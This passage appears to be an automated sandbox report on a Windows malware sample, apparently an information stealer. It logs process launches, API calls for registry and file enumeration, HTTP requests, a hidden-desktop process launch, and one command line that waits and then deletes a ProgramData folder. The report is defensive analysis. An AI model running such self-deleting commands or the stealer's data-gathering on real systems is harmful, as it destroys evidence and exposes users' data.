                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                      Start time:16:38:33
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:3
                                                                                                                                                                                                                                                      Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                      Start time:16:38:38
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6632 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8
                                                                                                                                                                                                                                                      Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                      Start time:16:38:38
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6800 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8
                                                                                                                                                                                                                                                      Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                      Start time:16:39:17
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGCFHDAKECFI" & exit
                                                                                                                                                                                                                                                      Imagebase:0xd70000
                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                      Start time:16:39:17
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                      Start time:16:39:17
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                                                                                                                      Imagebase:0x370000
                                                                                                                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                      Start time:16:39:33
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6136 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8
                                                                                                                                                                                                                                                      Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:15.1%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:10.4%
                                                                                                                                                                                                                                                        Total number of Nodes:260
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 9685 437d43 9686 437d5a 9685->9686 9689 43659a 9686->9689 9690 4365c7 9689->9690 9695 430c61 9690->9695 9691 436692 9694 430c61 wsprintfA FindFirstFileA 9691->9694 9692 4366f9 9694->9692 9696 430ca4 wsprintfA FindFirstFileA 9695->9696 9697 413e83 9698 413eaa lstrlenA 9697->9698 9700 413f44 InternetCrackUrlA 9698->9700 9701 413f5c 9700->9701 9702 42e301 9703 42e348 RegOpenKeyExA 9702->9703 9705 431780 9706 4317a1 ShellExecuteEx memset 9705->9706 9708 431913 ExitProcess 9706->9708 9709 431930 9708->9709 9710 437d85 9711 437d9c 9710->9711 9714 4368cd memset 9711->9714 9715 43691a 9714->9715 9721 430c61 2 API calls 9715->9721 9716 436a1d memset 9717 436a5c 9716->9717 9722 430c61 2 API calls 9717->9722 9718 436b40 memset 9719 436b7a 9718->9719 9723 430c61 2 API calls 9719->9723 9720 436c81 9721->9716 9722->9718 9723->9720 9728 43edc8 9729 43eddf LoadLibraryA 9728->9729 9731 43f221 9729->9731 9732 42e40c 9733 42e432 RegQueryValueExA 9732->9733 9735 401550 9736 40155f VirtualAlloc 9735->9736 9737 401589 9736->9737 9738 41ba91 socket 9739 42e393 RegQueryValueExA 9740 401613 lstrcmpiW 9741 4377d0 9742 437809 9741->9742 9779 4172d7 InternetCloseHandle 9742->9779 9781 417289 9742->9781 9784 416a5f 9742->9784 9743 43783c 9761 4172d7 InternetCloseHandle 9743->9761 9762 417289 InternetReadFile 9743->9762 9763 416a5f memcpy memcpy InternetReadFile 9743->9763 9744 4378bc 9758 4172d7 InternetCloseHandle 9744->9758 9759 417289 InternetReadFile 9744->9759 9760 416a5f memcpy memcpy InternetReadFile 9744->9760 9745 43793c 9764 42e2a9 RegEnumKeyExA 9745->9764 9765 42e829 GetVolumeInformationA 9745->9765 9766 433def GlobalMemoryStatusEx lstrlenA 9745->9766 9767 42d74f Process32Next 9745->9767 9768 42e20f RegOpenKeyExA 9745->9768 9769 42d66c RegQueryValueExA 9745->9769 9770 42dc73 RegOpenKeyExA 9745->9770 9771 42dcb1 RegQueryValueExA 9745->9771 9772 42d415 GetTimeZoneInformation 9745->9772 9773 42d6db CreateToolhelp32Snapshot Process32First 9745->9773 9774 42ec79 RegOpenKeyExA 9745->9774 9775 4305ff K32GetModuleFileNameExA 9745->9775 9776 42ee1f GetSystemInfo wsprintfA 9745->9776 9777 42df9f GetLocaleInfoA 9745->9777 9778 42d5fd RegOpenKeyExA 9745->9778 9746 43797b 9747 4379d4 9746->9747 9748 422be3 GetFileAttributesA 9746->9748 9749 422e56 13 API calls 9746->9749 9750 422aa7 31 API calls 9746->9750 9751 422f45 6 API calls 9746->9751 9752 423025 FindFirstFileA FindNextFileA GetFileAttributesA 9746->9752 9753 4233f9 13 API calls 9746->9753 9754 42316d GetFileAttributesA 9746->9754 9748->9747 9749->9747 9750->9747 9751->9747 9752->9747 9753->9747 9754->9747 9758->9745 9759->9745 9760->9745 9761->9744 9762->9744 9763->9744 9764->9746 9765->9746 9766->9746 9767->9746 9768->9746 9769->9746 9770->9746 9771->9746 9772->9746 9773->9746 9774->9746 9775->9746 9776->9746 9777->9746 9778->9746 9780 4172f7 9779->9780 9782 417239 InternetReadFile 9781->9782 9782->9781 9785 416a7c memcpy 9784->9785 9787 417184 memcpy 9785->9787 9790 417207 InternetReadFile 9787->9790 9791 43d1d5 9792 43d1f7 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 9791->9792 9794 43dd16 LoadLibraryA LoadLibraryA 9792->9794 9796 43ddbb LoadLibraryA 9794->9796 9797 437c9b 9798 437cb3 9797->9798 9804 431d74 9798->9804 9812 431d0d memset RegOpenKeyExA 9798->9812 9800 437cde 9805 431d95 9804->9805 9814 431951 9805->9814 9806 431e2c 9809 431951 FindFirstFileA 9806->9809 9807 431e70 9810 431951 FindFirstFileA 9807->9810 9808 431eb4 9808->9800 9813 42f29e CreateToolhelp32Snapshot Process32First 9808->9813 9809->9807 9810->9808 9815 43199a FindFirstFileA 9814->9815 9817 41bc58 9818 41bc73 send 9817->9818 9820 42e69b GetCurrentHwProfileA 9821 42ed59 9822 42ed6b GetUserNameA 9821->9822 9824 41bada 9825 41bb1a getaddrinfo 9824->9825 9826 436d1e 9827 436d39 FindFirstFileA 9826->9827 9829 40191d 9830 40194a HeapAlloc RegOpenKeyExA 9829->9830 9831 437ade 9832 437b15 9831->9832 9835 417289 InternetReadFile 9832->9835 9836 416a5f 3 API calls 9832->9836 9833 437c1c 9838 43613f 9833->9838 9835->9833 9836->9833 9839 43616c 9838->9839 9842 439f55 9839->9842 9843 439f9a 9842->9843 9850 43ad20 9843->9850 9857 43afbd 9843->9857 9862 43b1a9 9843->9862 9864 43b109 9843->9864 9873 43a85b 9843->9873 9851 43ad3e DeleteFileA 9850->9851 9853 43ae88 CopyFileA 9851->9853 9854 43aea5 9853->9854 9876 42f3a6 CreateFileA 9854->9876 9858 43afdd 9857->9858 9877 4200d2 9858->9877 9879 4201dd ReadFile 9858->9879 9863 43b1aa FindNextFileA 9862->9863 9865 43b156 9864->9865 9868 43ad20 3 API calls 9865->9868 9869 43a85b 3 API calls 9865->9869 9870 43b109 9 API calls 9865->9870 9871 43b1a9 FindNextFileA 9865->9871 9872 43afbd 2 API calls 9865->9872 9866 43b1a1 FindNextFileA 9868->9866 9869->9866 9870->9866 9871->9866 9872->9866 9874 43a86b 9873->9874 9875 43a8b2 FindFirstFileA memset memset 9874->9875 9878 420100 CreateFileA 9877->9878 9880 43069e 9881 4306be RtlAllocateHeap 9880->9881 9882 430b5c Sleep 9883 436f62 9884 436f82 FindNextFileA 9883->9884 9886 42dde3 memset 9887 42de32 RegOpenKeyExA 9886->9887 9888 42de60 9889 42de89 RegQueryValueExA 9888->9889 9890 42deaf 9889->9890 9891 430460 TerminateProcess 9892 43047a 9891->9892 9892->9892 9894 43c8e6 9895 43c8e8 9894->9895 9904 4012cb memset memset 9895->9904 9897 43c903 9898 40167f VirtualAllocExNuma 9897->9898 9899 43c90d 9898->9899 9900 401661 GetPEB 9899->9900 9901 43c917 9900->9901 9902 437203 OpenEventA 9901->9902 9903 43c935 9902->9903 9905 40131d 9904->9905 9906 437564 9907 437581 CreateDirectoryA 9906->9907 9909 437661 9907->9909 9919 432d18 9909->9919 9923 432e1c 9909->9923 9910 437672 InternetOpenA 9912 437707 InternetOpenA 9910->9912 9913 437742 9912->9913 9917 415f93 InternetReadFile 9913->9917 9918 4159ee lstrlenA lstrlenA InternetReadFile 9913->9918 9914 43778a 9917->9914 9918->9914 9920 432d33 9919->9920 9927 43b557 9920->9927 9924 432e2a 9923->9924 9954 43c73b 9924->9954 9928 43b585 9927->9928 9937 418c7e InternetCloseHandle 9928->9937 9939 418b3f InternetReadFile 9928->9939 9940 41898c 9928->9940 9943 41881d 9928->9943 9947 4189d7 9928->9947 9950 418925 InternetConnectA 9928->9950 9951 418a72 9928->9951 9938 418c34 9937->9938 9941 4189de HttpOpenRequestA 9940->9941 9944 418855 InternetOpenA 9943->9944 9946 4188d9 9944->9946 9948 4189de HttpOpenRequestA 9947->9948 9952 418a8d HttpSendRequestA 9951->9952 9953 418ac3 9952->9953 9955 43c767 9954->9955 9958 418b3f InternetReadFile 9955->9958 9959 437e24 9960 437e44 9959->9960 9961 437e52 9960->9961 9964 430031 9960->9964 9970 42feda CreateStreamOnHGlobal 9960->9970 9965 430043 9964->9965 9971 4151ec InternetReadFile 9965->9971 9966 430101 CloseWindow 9968 43018a 9966->9968 9968->9961 9975 437e73 9976 437eaa 9975->9976 9981 417289 InternetReadFile 9976->9981 9982 416a5f 3 API calls 9976->9982 9977 437edd 9979 417289 InternetReadFile 9977->9979 9980 416a5f 3 API calls 9977->9980 9978 437fab 9979->9978 9980->9978 9981->9977 9982->9977 9983 42f2f1 Process32Next 9984 41beb2 recv 9985 4379f5 9986 437a2c 9985->9986 9990 417289 InternetReadFile 9986->9990 9991 416a5f 3 API calls 9986->9991 9987 437a5f 9992 4034f7 9987->9992 9990->9987 9991->9987 9993 40352d 9992->9993 9997 4024a9 9993->9997 10000 4022fc 9993->10000 9998 4024c3 FindFirstFileA 9997->9998 10001 402316 FindFirstFileA 10000->10001 10003 41bb79 10004 41bb9f connect 10003->10004 10006 430bbb 10007 430bd7 CreateThread 10006->10007 10009 430c22 10007->10009 10010 431297 10007->10010 10011 4312cf 10010->10011 10012 41d57a 10013 41d52f InternetReadFile 10012->10013 10013->10012 10015 42dabe 10016 42dad0 GetComputerNameA 10015->10016 10018 4312fe 10019 431310 10018->10019 10023 4147c9 10019->10023 10037 4151ec InternetReadFile 10019->10037 10024 4147e4 lstrlenA 10023->10024 10026 414fee lstrlenA 10024->10026 10027 41500e RtlAllocateHeap 10026->10027 10028 415030 memcpy 10027->10028 10030 415085 lstrlenA memcpy 10028->10030 10031 4150bb lstrlenA 10030->10031 10032 4150d7 lstrlenA memcpy 10031->10032 10034 41513c lstrlenA 10032->10034 10035 415152 HttpSendRequestA 10034->10035 10036 415176 10035->10036 10038 437cfd 10039 437d1a 10038->10039 10042 42f232 10039->10042 10043 42f258 GetFileAttributesA 10042->10043

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 708 41fea7-42004d CreateDesktopA memset * 2 CreateProcessA
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Creatememset$DesktopProcess
                                                                                                                                                                                                                                                        • String ID: OCALAPPDATA
                                                                                                                                                                                                                                                        • API String ID: 2911880311-2158123194
                                                                                                                                                                                                                                                        • Opcode ID: 62d630cf881455325200ab1b9aff70751af170e7d5f4d1dd2174abe64b888b6e
                                                                                                                                                                                                                                                        • Instruction ID: 0b3de4e1580c6261d2f7d56bcdc20e0164fd2d98cef23774df56ab7278ba45d5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62d630cf881455325200ab1b9aff70751af170e7d5f4d1dd2174abe64b888b6e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB51C472904700DBDB04DF28DC81AAABBF5AF98300F04416DF849A3312DB70EA80CB58

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 737 43a85b-43a917 call 445e70 FindFirstFileA memset * 2
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memset$FileFindFirst
                                                                                                                                                                                                                                                        • String ID: %s\*.*$Xy'I
                                                                                                                                                                                                                                                        • API String ID: 2180624105-4031427208
                                                                                                                                                                                                                                                        • Opcode ID: bef613ac99ed4cd5309bc209674941006cbff660d7927f5a660b2ea6c11159cb
                                                                                                                                                                                                                                                        • Instruction ID: d81f27f8102c9568b4826317cd6ef0404a3d0b002648320992f9d14f0f126744
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bef613ac99ed4cd5309bc209674941006cbff660d7927f5a660b2ea6c11159cb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1311D0B59002199BD710CBA9DC95D9737FDEB86310B050179BA08D7382E634AE44CFA6
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00423B93
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID: d=E$d=E
                                                                                                                                                                                                                                                        • API String ID: 1974802433-3333608182
                                                                                                                                                                                                                                                        • Opcode ID: 4a2db1b41bd06cb3b949c408def3f64e7acf423632d9f7a974eaf61693d26023
                                                                                                                                                                                                                                                        • Instruction ID: c314923d8a0717e47e30c4f8c9f4a4ea5251c4debaca70b179ec60c09e0cb819
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a2db1b41bd06cb3b949c408def3f64e7acf423632d9f7a974eaf61693d26023
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C212DB27002159FDB14DB6CDC91A6D73B9EBC9605F04442DA82AE3352EE34EE18CB58
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004293B6
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID: /x%D$\*.*
                                                                                                                                                                                                                                                        • API String ID: 1974802433-2638526378
                                                                                                                                                                                                                                                        • Opcode ID: 3b7f67f0607212a2e8ebbcb8ca0481319d6aea30db6146d81f4e033baa9e40c9
                                                                                                                                                                                                                                                        • Instruction ID: a245b19d6da869d444f44430e2b1cb44cb39c1d56f678c4ecab4f6857f77e69b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b7f67f0607212a2e8ebbcb8ca0481319d6aea30db6146d81f4e033baa9e40c9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 632150B2600218AFCB04DB6CEC91EA973B9EBC8745B040458E416E3352EA34EE05CB58
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
